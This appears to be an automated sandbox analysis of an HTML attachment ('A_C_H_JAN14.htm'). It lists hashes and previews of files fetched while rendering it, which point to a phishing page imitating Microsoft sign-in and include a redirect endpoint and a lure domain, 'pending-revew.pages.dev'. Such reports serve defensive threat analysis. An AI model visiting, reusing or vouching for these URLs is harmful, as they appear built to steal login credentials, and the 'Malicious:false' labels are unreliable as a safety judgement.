                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                            Category:dropped
                                            Size (bytes):17174
                                            Entropy (8bit):2.9129715116732746
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:JSON data
                                            Category:downloaded
                                            Size (bytes):78
                                            Entropy (8bit):4.3818424507205185
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:871B4DF854B06DFB3A615FD61ECC7490
                                            SHA1:8B6D66569748C631D5F11EC79320A55A4E8D5898
                                            SHA-256:C2F98625602B952B42A41C21999DD9522E4B12B2FC6E75AB05DF491B5D8EF0EC
                                            SHA-512:314744BB3D227522284F702D73F2968E0856882E1497EE10E4B2F1D6FC39746D2C823A6259878A92A828535AAAAB65A6196A6F2C61F1B376A3190EA1C2A9B5AF
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://natrium100gram.site/public/api/page/redirect
                                            Preview:{"status":"success","message":"https:\/\/pending-revew.pages.dev\/#?service="}
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                            Category:downloaded
                                            Size (bytes):49954
                                            Entropy (8bit):7.99493321471063
                                            Encrypted:true
                                            SSDEEP:
                                            MD5:E16AC075AC754DBD1CF969508220E30D
                                            SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                            SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                            SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js
                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                            Category:dropped
                                            Size (bytes):48316
                                            Entropy (8bit):5.6346993394709
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:2CA03AD87885AB983541092B87ADB299
                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                            Category:downloaded
                                            Size (bytes):61
                                            Entropy (8bit):3.990210155325004
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                            File type:HTML document, ASCII text, with very long lines (424), with CRLF line terminators
                                            Entropy (8bit):4.624444587005303
                                            TrID:
                                            • HyperText Markup Language (15015/1) 20.56%
                                            • HyperText Markup Language (12001/1) 16.44%
                                            • HyperText Markup Language (12001/1) 16.44%
                                            • HyperText Markup Language (11501/1) 15.75%
                                            • HyperText Markup Language (11501/1) 15.75%
                                            File name:A_C_H_JAN14.htm
                                            File size:6'676 bytes
                                            MD5:1df9751c6e80d2f2a9fa3c926e118317
                                            SHA1:e89c7c6e532e82d7bf2d1471a061a9b29258819e
                                            SHA256:916859eff63990aa5fe16534bf4fbab689af37db673be426289f6bfdba68abc7
                                            SHA512:d0e42467c4814a6099fbeaa007974a16609abccd8a23fdfda2cf504a126eea9ccf9a759966edbfba5da0aa4af2c88b106c33a4a46d9b5c970cb659cdf49c79ab
                                            SSDEEP:48:thQ2hqMj9VQwpivTD3F7Xn/lDM+RUafaCU7bMGVTxZG6XvALII5n63xs4IUbyLcI:ThCvvXFBVUayJrq6/fI5nm7WLUWt1co
                                            TLSH:A1D174002CA9511542B792724B33E50AFF6267271301D399BBEDD7460FF79248AA7AEC
                                            File Content Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Loading Document - Enhanced</title>.. <style>.. body {.. margin: 0;..
                                            Icon Hash:173149cccc490307